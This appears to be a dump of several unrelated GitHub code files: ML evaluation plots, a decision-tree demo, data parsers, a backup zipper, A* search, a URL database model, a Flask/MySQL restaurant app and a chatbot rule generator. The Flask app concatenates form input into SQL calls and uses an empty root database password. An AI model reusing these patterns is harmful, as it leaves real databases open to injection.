train_predictions[:,idx] # predicted\n myplot.plot_predict_target(b, a, sort_by_target=True)\n plt.title(species[idx])\n plt.savefig(filename)\n\n\n#---------------------------------------------EVALUATION OF TEST SET------------------------------------------------------\n\n test_file = 'data\\\\datapointsk1k2k3.txt'\n all_xy = np.loadtxt(test_file,\n usecols=[0,1,2,3,4,5,6,7,8,9,10,11], delimiter=\" \",\n # usecols=range(0,9), delimiter=\"\\t\",\n comments=\"#\", skiprows=0, dtype=np.float64)\n\n tmp_x = all_xy[:,[9,10,11]] # Change this manually\n tmp_y = all_xy[:,k_columns] \n\n func1 = multipy(tmp_y, col1 = 0, col2 = 1)\n func2 = divide(tmp_y, col1 = 0, col2 = 1)\n func3 = add(tmp_y, col1 = 0, col2 = 1)\n\n stack = np.column_stack((func1,func2, func3, tmp_y))\n tmp_y = stack\n\n # Normalize data\n tmp_x = full_dataset.scaler_max_abs.transform(tmp_x)\n tmp_y = full_dataset.scaler.transform(tmp_y)\n\n x_data = T.tensor(tmp_y, \\\n dtype=T.float64).to(device)\n y_data = T.tensor(tmp_x, \\\n dtype=T.float64).to(device)\n\n predict = model(x_data).detach().numpy()\n target = y_data.numpy()\n densities = x_data.numpy()\n\n # Create a scatter plot of the two densitie arrays against each other\n for idx in range(len(predict[0])):\n filename = 'Images\\\\Full_ROM_model\\\\correlations_test' + str(idx+1)+'.png'\n plt.clf()\n a = target[:,idx]\n b = predict[:,idx]\n plt.scatter(a, b)\n\n rel_err = np.abs(np.subtract(a,b)/a)\n # print(rel_err)\n # print(\"stats: \",stats.chisquare(f_obs= b, f_exp= a))\n\n textstr = '\\n'.join((\n r'$Mean\\ \\epsilon_{rel}=%.2f$%%' % (rel_err.mean()*100, ),\n r'$Max\\ \\epsilon_{rel}=%.2f$%%' % (max(rel_err)*100, )))\n\n # colour point o max error\n max_index = np.argmax(rel_err)\n plt.scatter(a[max_index],b[max_index] , color=\"gold\", zorder= 2)\n\n # these are matplotlib.patch.Patch properties\n props = dict(boxstyle='round', alpha=0.5) #, facecolor='none', edgecolor='none')\n\n # place a text box in upper left in axes coords\n plt.text(0.70, 0.25, textstr, fontsize=14, transform=plt.gca().transAxes,\n verticalalignment='top', bbox=props)\n \n # Add labels and a title\n plt.xlabel('True densities')\n plt.ylabel('Predicted densities')\n plt.title(species[idx])\n # Add a diagonal line representing perfect agreement\n plt.plot([0, 1], [0, 1], linestyle='--', color='k')\n plt.savefig(filename)\n\n\n","repo_name":"marcelo-rg/KineticLearn","sub_path":"other_scripts/ROM/neural_ROM.py","file_name":"neural_ROM.py","file_ext":"py","file_size_in_byte":14896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11512246381","text":"import numpy as np\nimport operator\nimport pandas as pd\nfrom Nodes import DecisionNode, LeafNode\nfrom DecisionTree import DecisionTree\n\n# df from the paper c4.5\ndf = pd.DataFrame({'Outlook': ['sunny', 'sunny', 'sunny', 'sunny', 'sunny', None, 'overcast', 'overcast', 'overcast', 'rain', 'rain', 'rain', 'rain', 'rain'],\n#df = pd.DataFrame({'Outlook': ['sunny', 'sunny', 'sunny', 'sunny', 'sunny', 'overcast', 'overcast', 'overcast', 'overcast', 'rain', 'rain', 'rain', 'rain', 'rain'],\n 'Temperature': [75, 80, 85, 72, 69, 72, 83, 64, 81, 71, 65, 75, 68, 70],\n 'Humidity': [70, 90, 85, 95, 70, 90, 78, 65, 75, 80, 70, 80, 80, 96], \n 'Windy': [True, True, False, False, False, True, False, True, False, True, True, False, False, False], \n 'target': [\"Play\", \"Don't Play\", \"Don't Play\", \"Don't Play\", \"Play\", \"Play\", \"Play\", \"Play\", \"Play\", \"Don't Play\", \"Don't Play\", \"Play\", \"Play\", \"Play\"]})\nattributes_map = {'Outlook': 'categorical', 'Temperature': 'continuous', \n 'Humidity': 'continuous', 'Windy': 'boolean', 'target': 'categorical'}\ndt = DecisionTree(attributes_map)\ndt.fit(df)\nrules = dt.extract_rules()\nprint(\"\\nRules extracted\")\nfor rule in rules.keys():\n print(\"{}:\".format(rule))\n print(rules[rule])\npred_df = df.fillna('?').iloc[[1,5]]\npred_df = pred_df.append({'Outlook': 'sunny', 'Temperature': 70, 'Humidity': '?', 'Windy': False, 'target': 'stocazzo'}, ignore_index=True)\npredictions = dt.predict(pred_df.drop(columns=['target']))\nprint(\"\\nPredictions\")\nprint(predictions)\n","repo_name":"piepor/decision-mining","sub_path":"decision-tree-algo.py","file_name":"decision-tree-algo.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74792325602","text":"import numpy as np\nimport scipy\nimport csv\n\nclass PenParser:\n def __init__(self):\n self.UJI_PENCHARS_DATA = \"../data/ujipenchars2.txt\"\n self.PENDIGITS_TRAINING_DATA = \"../data/pendigits.tra\"\n self.PENDIGITS_TESTING_DATA = \"../data/pendigits.tes\"\n \n def parse_pendigits_csv(self, file_name):\n \"\"\"\n Returns data, answers\n data is a numpy 2darray of floats of shape (num_samples, 16)\n answers is a numpy array of ints of shape (num_samples)\n \"\"\"\n reader = csv.reader(open(file_name))\n lines = list()\n for row in reader:\n lines.append(row)\n \n data = np.zeros((len(lines), 16))\n answers = np.zeros(len(lines))\n\n lines = np.random.permutation(lines)\n\n for i in range(len(lines)):\n data[i,] = map(lambda x: float(x)/100.0, lines[i][:-1])\n answers[i] = int(lines[i][-1])\n\n return data, answers\n\n def parse_UJI_penchars(self, file_name):\n \"\"\" To be implemented \"\"\"\n pass\n \n def retrieve_pendigits_data(self, labeled_fraction):\n \"\"\"\n labeled_fraction (float between 0 and 1) is the fraction of labeled\n training data whose label should be kept\n\n Returns\n X_train_labeled - numpy 2darray of shape (num_labeled_samples, 16)\n Y_train_labeled - numpy 1darray of shape (num_labeled_samples)\n X_train_unlabeled - numpy 2darray of shape (num_unlabeled_samples, 16)\n X_test - numpy 2darray of shape (num_test_samples, 16)\n Y_test - numpy 1darray of shape (num_labeled_samples)\n \"\"\"\n \n data_train, answers_train = self.parse_pendigits_csv(self.PENDIGITS_TRAINING_DATA)\n data_test, answers_test = self.parse_pendigits_csv(self.PENDIGITS_TESTING_DATA)\n \n num_train = data_train.shape[0]\n num_labeled = int(num_train * labeled_fraction)\n\n X_train_labeled = data_train[0:num_labeled, ]\n Y_train_labeled = answers_train[0:num_labeled]\n X_train_unlabeled = data_train[num_labeled:num_train, ]\n X_test = data_test\n Y_test = answers_test\n \n return X_train_labeled, Y_train_labeled, X_train_unlabeled, X_test, Y_test\n","repo_name":"jbrakensiek/10701-ss-learning","sub_path":"code/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35436589966","text":"import os, zipfile\n\ndef backup(folder):\n number=1\n while True:\n abs_path=os.path.abspath(folder)\n foldername=os.path.basename(abs_path)\n foldername=foldername+\"_\"+str(number)+\".zip\"\n if(not os.path.exists(foldername)):\n break\n number=number+1\n backupzip=zipfile.ZipFile(foldername,'w')\n print(\"Creating \"+foldername)\n #print(abs_path)\n #print(filename)\n for folder,subfolder,file in os.walk(folder):\n print(\"Adding \"+folder)\n backupzip.write(folder)\n for filename in file:\n print(\"Adding \"+filename)\n backupzip.write(os.path.join(folder,filename))\n \n\nbackup('C:\\\\Example')\n","repo_name":"mahananda96/AutomateStuffWithPython","sub_path":"backupzip.py","file_name":"backupzip.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17713449641","text":"# A star search with a consistent heuristic\n# consistent - h(n) <= cost(n,nb) + h(nb) for all neighbors nb of node n\n# Just admissible - never overestimates\n\nfrom collections import defaultdict\nfrom heapq import heappush, heappop\nimport math\n\ndef a_star(\n start, #node\n goal, #fn, node -> bool\n heuristic, #fn, node -> int (consistent heuristic)\n neighbors, #fn, node -> generator\n edgeCost, #fn, node, node -> int\n):\n \n q = []\n heappush(q, (0,start))\n \n closed = set() # NOT seen list\n \n dist = defaultdict(lambda: math.inf) # curr best, g(x)\n dist[start] = 0\n \n parent = {}\n def get_path(n):\n if n==start: return [n]\n return get_path(parent[n]) + [n]\n\n while q:\n _, n = heappop(q)\n d = dist[n]\n \n if n in closed: continue \n closed.add(n) # Don't add to closed below, like for seen list\n \n if goal(n): \n return d, get_path(n)\n \n for nb in neighbors(n):\n dcalc = edgeCost(n, nb) + d\n if dcalc < dist[nb]: \n # Won't happen for visited nodes if heuristic is consistent\n # If heuristic is only admissible, also remove from closed set here \n parent[nb] = n\n dist[nb] = dcalc\n f = dcalc + heuristic(nb)\n heappush(q, (f, nb))\n # Actually need to re-prioritize okay \n\n return None, None\n\n\n# Compare Djikstra\n\ndef djikstra(graph, source, undirected = False):\n\n pq = [(0,source)]\n dist = {source:0}\n seen = set() # also need this; because a node can be added multiple times\n\n while pq:\n dcurr, node = heappop(pq)\n \n if node in seen: continue\n seen.add(node)\n\n for nb, w in graph[node]:\n dcalc = dcurr + w\n if dist.get(nb, math.inf) > dcalc: \n dist[nb] = dcalc\n heappush(pq, (dcalc, nb))\n \n return dist","repo_name":"rajkar86/python_coding_interviews","sub_path":"basics/a_star_search.py","file_name":"a_star_search.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24058312360","text":"import time\n\nfrom libs.common import md5\nfrom classes.models.CommonModel import CommonModel\nfrom classes.Registry import Registry\n\nclass UrlsBaseModel(CommonModel):\n \"\"\" Class for work with urls_base* tables \"\"\"\n _pathCache = {}\n\n def _get_insert_row(self, path, host_id, parent_id):\n \"\"\" Build and return ready row to insert in DB \"\"\"\n return {\n 'host_id': host_id,\n 'project_id': Registry().get('pData')['id'],\n 'name': path,\n 'parent_id': parent_id,\n 'when_add': int(time.time()),\n }\n\n def _path_exists(self, host_id, parent_id, name):\n \"\"\" Is current path exists? \"\"\"\n _hash = md5(\"{0}-{1}-{2}\".format(host_id, parent_id, name))\n if _hash not in self._pathCache.keys():\n self._pathCache[_hash] = \\\n self._db.fetch_one(\n 'SELECT id FROM urls_base WHERE host_id = {0} AND parent_id = {1} AND name = {2}'.\n format(int(host_id), int(parent_id), self._db.quote(name))\n )\n return self._pathCache[_hash]\n\n def _add_path_cache(self, host_id, parent_id, name, _id):\n \"\"\" Add branch id to path-cache \"\"\"\n _hash = md5(\"{0}-{1}-{2}\".format(host_id, parent_id, name))\n self._pathCache[_hash] = _id\n\n def add_url(self, host_id, url):\n \"\"\" Add url in database (with break on parts) \"\"\"\n params = url.split('?')[1] if url.count('?') else ''\n url = url.split('?')[0]\n\n parent_id = 0\n\n if url == '/':\n if not self._path_exists(host_id, 0, '/'):\n new_parent_id = self._db.insert(\"urls_base\", self._get_insert_row(url, host_id, 0))\n self._add_path_cache(host_id, 0, '/', new_parent_id)\n else:\n url = url.split('/')\n for url_part in url:\n if url_part == '':\n if parent_id != 0:\n continue\n\n new_parent_id = self._path_exists(host_id, 0, '/')\n if new_parent_id is None:\n new_row = self._get_insert_row('/', host_id, 0)\n try:\n new_parent_id = self._db.insert(\"urls_base\", new_row)\n self._add_path_cache(host_id, 0, '/', new_parent_id)\n except BaseException:\n pass\n\n parent_id = new_parent_id\n else:\n new_parent_id = self._path_exists(host_id, parent_id, url_part)\n if new_parent_id is None:\n new_row = self._get_insert_row(url_part, host_id, parent_id)\n new_parent_id = self._db.insert(\"urls_base\", new_row)\n self._add_path_cache(host_id, parent_id, url_part, new_parent_id)\n\n parent_id = new_parent_id\n\n if len(params):\n for param in params.split('&'):\n self._db.insert('urls_base_params', {'parent_id': parent_id, 'name': param.split(\"=\")[0]}, True)\n\n","repo_name":"hack4sec/ws-cli","sub_path":"classes/models/UrlsBaseModel.py","file_name":"UrlsBaseModel.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"36488958250","text":"\nfrom flask import Flask\nfrom flask import Flask, render_template, request, redirect, json\nfrom flaskext.mysql import MySQL\n\napp = Flask(__name__)\nmysql = MySQL()\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = 'MyRestaurant'\napp.config['MYSQL_DATABASE_HOST'] = '127.0.0.1'\nmysql.init_app(app)\n\nconn = mysql.connect()\ncursor = conn.cursor() #kursor MySQL\n\n\n# określenie katalogu głównego\n@app.route(\"/\") \ndef main():\n return render_template('index.html')\n\n\n\n# określenie jak ma sie otworzyć strona MakeNewOrder\n@app.route('/MakeNewOrder')\ndef MakeNewOrder():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n return render_template('MakeNewOrder.html',data2 = data)\n\n# określenie zachowania przycisku\n@app.route('/MakeNewOrderInput',methods= ['GET','POST'])\ndef MakeNewOrderInput():\n\n cursor.execute(\"SELECT * FROM pending_orders\")\n data2 = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n orderId = req.get(\"MakeNewOrder_orderId\") # wyciągnięcie szukanych danych z formularz\n dishId = req.get(\"MakeNewOrder_dishId\")\n cusId = req.get(\"MakeNewOrder_customerId\")\n\n cursor.callproc('make_order',(orderId,dishId,cusId))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n\n return render_template(\"MakeNewOrder.html\",data2=data2)\n\n\n\n\n\n@app.route('/FinalizeOrder')\ndef FinalizeOrder():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n return render_template('FinalizeOrder.html',data2=data)\n\n@app.route('/FinalizeOrderInput',methods= ['GET','POST'])\ndef FinalizeOrderInput():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data2 = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n orderId = req.get(\"FinalizeOrderInput_orderId\") # wyciągnięcie szukanych danych z formularz\n empId = req.get(\"FinalizeOrderInput_empId\")\n \n cursor.callproc('finalize_order',(orderId,empId))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n\n return render_template(\"FinalizeOrder.html\",data2=data2)\n\n\n\n@app.route('/MakeSupplyOrder')\ndef MakeSupplyOrder():\n cursor.execute(\"SELECT * FROM supply_orders\")\n data = cursor.fetchall()\n return render_template('MakeSupplyOrder.html',data2=data)\n\n@app.route('/MakeSupplyOrderInput',methods= ['GET','POST'])\ndef MakeSupplyOrderInput():\n cursor.execute(\"SELECT * FROM supply_orders\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n ShopId = req.get(\"Shop_Id\") # wyciągnięcie szukanych danych z formularz\n EmpId = req.get(\"Emp_id\")\n SupVal = req.get(\"Sup_val\")\n\n cursor.callproc('make_supply_order',(ShopId,EmpId,SupVal))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template('MakeSupplyOrder.html',data2 = data)\n\n\n@app.route(\"/ManageMenu\")\ndef ManageMenu():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n return render_template(\"ManageMenu.html\",data2=data)\n\n@app.route(\"/UpdateMenuInput\",methods= ['GET','POST'])\ndef UpdateMenuInput():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n id = req.get(\"ManageMenu_dishId\") # wyciągnięcie szukanych danych z formularz\n dish = req.get(\"ManageMenu_dish\")\n price = req.get(\"ManageMenu_price\")\n veg = req.get(\"ManageMenu_vegetarian\")\n gluten = req.get(\"ManageMenu_gluten\")\n\n cursor.callproc('update_menu',(id,dish,price,veg,gluten))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageMenu.html\",data2=data)\n\n\n@app.route(\"/AddMenuInput\",methods= ['GET','POST'])\ndef AddMenuInput():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n dish = req.get(\"ManageMenu_dish\")\n price = req.get(\"ManageMenu_price\")\n veg = req.get(\"ManageMenu_vegetarian\")\n gluten = req.get(\"ManageMenu_gluten\")\n\n cursor.callproc('add_to_menu',(dish,price,veg,gluten))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageMenu.html\",data2=data)\n\n\n@app.route(\"/ManageOrders\")\ndef ManageOrders():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n return render_template(\"ManageOrders.html\",data2=data,data3=dataC)\n\n@app.route(\"/DeletePending\",methods= ['GET','POST', 'DELETE'])\ndef DeletePending():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n Id = req.get(\"ManageMenu_dishId\")\n print(type(Id))\n print(Id)\n # cursor.callproc('delete_pending',Id)\n cursor.execute(\"call delete_pending(\"+Id+\")\")\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageOrders.html\",data2=data, data3=dataC)\n\n@app.route(\"/DeleteFinalized\",methods= ['GET','POST', 'DELETE'])\ndef DeleteFinalized():\n cursor.execute(\"SELECT * FROM pending_orders\")\n dataP = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n Id = req.get(\"ManageMenu_dishId\")\n\n #cursor.callproc('delete_finalized',Id)\n cursor.execute(\"call delete_finalized(\"+Id+\")\")\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageOrders.html\",data2=dataP, data3=dataC)\n\n\n\n\n@app.route(\"/ViewVegetarian\") \ndef ViewVegetarian():\n cursor.execute(\"SELECT * FROM vegetarian_menu\")\n data = cursor.fetchall()\n return render_template('ViewVegetarian.html',data2=data)\n\n\n@app.route(\"/ViewGlutenFree\") \ndef ViewGlutenFree():\n cursor.execute(\"SELECT * FROM vegetarian_menu\")\n data = cursor.fetchall()\n return render_template('ViewGlutenFree.html',data2=data)\n\n@app.route(\"/ViewEmployees\")\ndef ViewEmployees():\n cursor.execute(\"SELECT * FROM employees\")\n data = cursor.fetchall()\n return render_template('ViewEmployees.html',data2=data)\n\n\n@app.route(\"/ViewMenu\")\ndef ViewMenu():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n return render_template('ViewMenu.html',data2=data)\n\n@app.route(\"/ViewCustomers\")\ndef ViewCustomers():\n cursor.execute(\"SELECT * FROM customers\")\n data = cursor.fetchall()\n return render_template('ViewCustomers.html',data2=data)\n\n@app.route(\"/ViewMostPopularDish\") \ndef ViewMostPopularDish():\n cursor.execute(\"SELECT * FROM most_popular_dish\")\n data = cursor.fetchall()\n return render_template('ViewMostPopularDish.html',data2=data)\n\n\n@app.route(\"/ViewFinalized\") \ndef ViewFinalized():\n cursor.execute(\"SELECT * FROM completed_orders\")\n data = cursor.fetchall()\n return render_template('ViewFinalized.html',data2=data)\n\nif __name__ == \"__main__\":\n app.run()\n\n","repo_name":"mati-kw/Projekt-MySQL","sub_path":"FlaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34329568888","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\n\nimport add_syns\nimport preprocessing\nimport find_keywords\nfrom utils import plural_singular\n\nBOTNAME = 'botin'\npln_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nBOTPATH = os.path.join(pln_dir, 'ChatScript', 'RAWDATA', BOTNAME)\n\n\nclass Rejoinder(object):\n rule_label = None\n pattern = None\n\n def __init__(self, rule_label, pattern=None):\n self.rule_label = rule_label\n self.pattern = pattern\n\n def __str__(self):\n if self.pattern:\n pattern = '[{}]'.format(self.pattern)\n cant_help = ''\n else:\n pattern = '[~yess ~adv_afirmacao]'\n cant_help = (\n '\\n\\ta: ([~noo ~adv_negacao])\\n\\t'\n ' $err = ^save_input_error($quest %topic)\\n\\t'\n ' ^pick(~cant_help), ^pick(~not_ready_yet), mas '\n '^pick(~tranfeer)'\n )\n\n string = (\n '\\ta: ({pattern})\\n\\t'\n ' $res = ^save_input($quest %topic {rule_label})\\n\\t'\n ' ^reuse({rule_label})'\n '{cant_help}'\n ).format(\n pattern=pattern, rule_label=self.rule_label, cant_help=cant_help\n )\n\n return string\n\n\nclass Rule(object):\n label_type = None\n rule_id = None\n title = None\n original_question = None\n nosw_question = None\n ppcd_question = None\n add_syns_question = None\n final_question = None\n answer = None\n ctx_entities = None\n\n label = None\n entities = None\n intentions = None\n intentions_syns_dict = None\n splited_entities = None\n\n def __init__(\n self, rule_id, title, question, answer, ctx_entities,\n embedding_model, syns, label_type='U', add_syns_question=None\n ):\n self.label_type = label_type\n self.rule_id = rule_id\n self.title = title\n self.original_question = question\n self.answer = answer\n self.ctx_entities = ctx_entities\n self.label = label_type + str(rule_id)\n self.splited_entities = list()\n self.syns = syns\n\n if add_syns_question is None:\n self.do_preprocessing()\n self.find_intentions_entities()\n self.add_syns(embedding_model)\n else:\n self.add_syns_question = add_syns_question\n\n self.add_plurals_and_nouns_syns(embedding_model)\n\n def do_preprocessing(self):\n self.ppcd_question = preprocessing.preprocess(\n self.original_question, self.ctx_entities\n )\n\n def find_intentions_entities(self):\n # Remove wildcards from preprocessed question\n self.nosw_question = re.sub(r'\\*~\\d+', '', self.ppcd_question)\n\n self.entities = find_keywords.find_entities(self.nosw_question)\n\n for ent in self.entities:\n self.splited_entities.extend(ent.split())\n self.splited_entities = set(self.splited_entities)\n\n self.intentions = find_keywords.find_intention(\n self.nosw_question, self.entities\n )\n\n def add_syns(self, embedding_model):\n self.intentions_syns_dict = add_syns.get_syns(\n self.intentions, embedding_model\n )\n self.add_syns_question = add_syns.add_intentions_syns(\n self.ppcd_question, self.intentions_syns_dict\n )\n\n def get_syns(self, ent):\n for synset in self.syns:\n if ent in synset:\n return synset\n return [ent]\n\n def add_plurals_and_nouns_syns(self, embedding_model):\n question = self.add_syns_question\n entities = list()\n tg_words = find_keywords.tag_text(self.add_syns_question)\n for word in tg_words.split(' '):\n if (\n not word.startswith('*') and\n find_keywords.has_tags(word, ['N', 'NPROP', 'ADJ', 'PCP'])\n ):\n entities.append(word.split('/')[0])\n\n for ent in entities:\n syns = self.get_syns(ent)\n plurals = list()\n for syn in syns:\n syn_plural = plural_singular.get_plurals(syn, embedding_model)\n if syn_plural:\n plurals.append(syn_plural)\n\n plurals_text = ' {}'.format(' '.join(plurals)) if plurals else ''\n question = question.replace(\n ent, '[{}{}]'.format(' '.join(syns), plurals_text)\n )\n\n self.add_syns_question = question\n\n @property\n def nospace_question(self):\n return self.nosw_question.replace(' ', ' ')\n\n @property\n def intentions_syns_list(self):\n intentions = list()\n for _, value in self.intentions_syns_dict.items():\n intentions.extend(value)\n return intentions\n\n @property\n def keywords(self):\n kw = set(\n self.intentions +\n self.intentions_syns_list +\n self.entities\n )\n return list(kw)\n\n def processed_answer(self):\n calls = re.findall(r'(.*?<<.*?)>>', self.answer)\n tam = len(calls)\n # TODO: THROW EXCEPTION IF NUM CALLS > REJOINDERS\n rjds = ['a', 'b', 'c', 'd', 'e']\n spaces = '\\t'\n\n answer = ''\n for i in range(tam):\n call_answer, args = calls[i].split('<<')\n args = args.split(' ')\n spaces = '\\t'*(i+1)\n\n if i>0:\n start_rj = '{rj}: ()\\n{spc}'.format(\n rj=rjds[i-1], spc=spaces\n )\n else:\n start_rj = ''\n\n answer = answer + (\n '{start_rejoinder}{answer}\\n'\n '{spc}{program} {param}\\n'\n ).format(\n botpath=BOTPATH,\n start_rejoinder=start_rj,\n answer=call_answer,\n program=args[0],\n param=args[1],\n spc=spaces\n )\n\n if answer:\n self.answer = answer\n\n review = (\n '\\n{spc}$rule = %rule\\n{spc}^reuse(~review_interacion.REVIEW)'\n ).format(spc=spaces)\n return self.answer + review\n\n def __str__(self):\n text = (\n '{extra_space}u: {label} ({rule}){space}{answer}'\n ).format(\n extra_space='\\n'*2 if self.rule_id == 0 else '',\n label=self.label,\n id=self.rule_id,\n rule=self.add_syns_question,\n space='\\n\\t' if self.label_type != 'S' else ' ',\n answer=self.processed_answer()\n )\n return text\n\n\nclass GenericRule(object):\n group = None\n words = None\n questions = None\n rule_id = None\n label = None\n label_type = None\n rejoinders = None\n original_topic_name = None\n wordembedding = None\n\n def __init__(\n self, rule_id, group, words, original_topic_name,\n label_type='G', wordembedding=None\n ):\n self.rule_id = rule_id\n self.label_type = label_type\n self.label = label_type + str(rule_id)\n self.group = group\n self.questions = [rule.original_question for rule in group]\n self.words = words\n self.original_topic_name = original_topic_name\n self.generate_rejoinders()\n self.wordembedding = wordembedding\n\n def generate_rejoinders(self):\n self.rejoinders = list()\n if len(self.group) > 1:\n all_words = set()\n group_entities = self.words.split()\n for rule in self.group:\n # Remove common questions keywords to improve distinction\n keywords = [\n kw for kw in rule.keywords\n if kw not in group_entities and kw not in all_words\n ]\n all_words.update(keywords)\n keywords = ' '.join(keywords)\n label = '~{}.{}'.format(self.original_topic_name, rule.label)\n rej = Rejoinder(label, keywords)\n self.rejoinders.append(rej)\n # Do remove repeated words in multiple rejoinders\n else:\n keywords = None\n label = '~{}.{}'.format(\n self.original_topic_name, self.group[0].label\n )\n rej = Rejoinder(label, keywords)\n self.rejoinders.append(rej)\n\n def rejoinders_text(self):\n return '\\n'.join([ref.__str__() for ref in self.rejoinders])\n\n def __str__(self):\n words_with_plural = list()\n for word in self.words.split(' '):\n plural = plural_singular.get_plurals(\n word, cbow=self.wordembedding\n )\n if plural:\n words_with_plural.append('[{} {}]'.format(word, plural))\n else:\n words_with_plural.append(word)\n\n words_with_plural = ' '.join(words_with_plural)\n\n if len(self.group) > 1:\n\n gen_rule = (\n 'u: {label} (<<{words}>>)\\n\\t'\n '$quest = %originalsentence\\n\\t'\n '^pick(~not_well_understood), %user, '\n 'mas ^pick(~search_options):\\n\\t - {questions}\\n'\n '{group_rejoinders}'\n ).format(\n label=self.label,\n words=words_with_plural,\n questions='\\n\\t - '.join(self.questions) + ' -',\n group_rejoinders=self.rejoinders_text()\n )\n else:\n gen_rule = (\n 'u: {label} (<<{words}>>)\\n\\t'\n '$quest = %originalsentence\\n\\t'\n '^pick(~not_well_understood), %user, '\n '^pick(~you_mean) \"{sugestion}\"?\\n'\n '{group_rejoinders}'\n ).format(\n label=self.label,\n words=words_with_plural,\n sugestion=self.group[0].title,\n group_rejoinders=self.rejoinders_text()\n )\n\n return gen_rule\n\n\nclass Group(object):\n rules = None\n entity = None\n\n def __init__(self, rules, entity):\n self.rules = rules\n self.entity = entity\n\n\nclass Topic(object):\n name = None\n keywords = None\n rules = None\n max_return_code = 100\n beauty_name = None\n wordembedding = None\n\n def __init__(self, name, rules, wordembedding, beauty_name=None):\n self.name = name\n self.rules = rules\n self.keywords = list()\n self.beauty_name = beauty_name\n self.wordembedding = wordembedding\n\n if self.name.endswith('_gen'):\n self.keywords.append('REGRAS_GENERICAS')\n self.random = ''\n else:\n self.random = ''\n for rule in self.rules:\n if rule.entities:\n self.keywords.extend(rule.entities)\n else:\n self.keywords.append(rule.original_question)\n new_keywords = list()\n for ent in self.keywords:\n new_keywords.extend(self.rules[0].get_syns(ent))\n self.keywords = new_keywords\n\n def generate_keywords_plurals(self):\n plurals = list()\n if self.name.endswith('_gen'):\n return plurals\n\n for kw in self.keywords:\n plural = ''\n for subkw in kw.split(' '):\n plural_sub = plural_singular.get_plurals(\n subkw, cbow=self.wordembedding\n )\n if plural_sub:\n plural = plural + ' ' + plural_sub\n plurals.append(plural)\n return plurals\n\n def __str__(self):\n\n rules_text = '\\n'.join([rule.__str__() for rule in self.rules])\n if self.name.endswith('_gen'):\n default_rule = '\\nu: SET_VAR ()\\n\\t$do_review = null\\n\\n'\n search_rule_text = ''\n else:\n default_rule = (\n '\\nu: SET_VAR ()\\n\\t$quest = %originalsentence'\n '\\n\\t$do_review = true'\n )\n search_rule_text = (\n 'u: SEARCH_RULE ()\\n'\n '\\t$res = ^search_rule(%originalsentence %topic) / 256\\n'\n '\\tif($res<{max_return}){{\\n'\n '\\t\\t^reuse(^join(U $res))\\n'\n '\\t}}else{{\\n'\n '\\t\\t$go_to_menu = false\\n'\n '\\t\\t^respond(~topics)\\n'\n '\\t\\tif 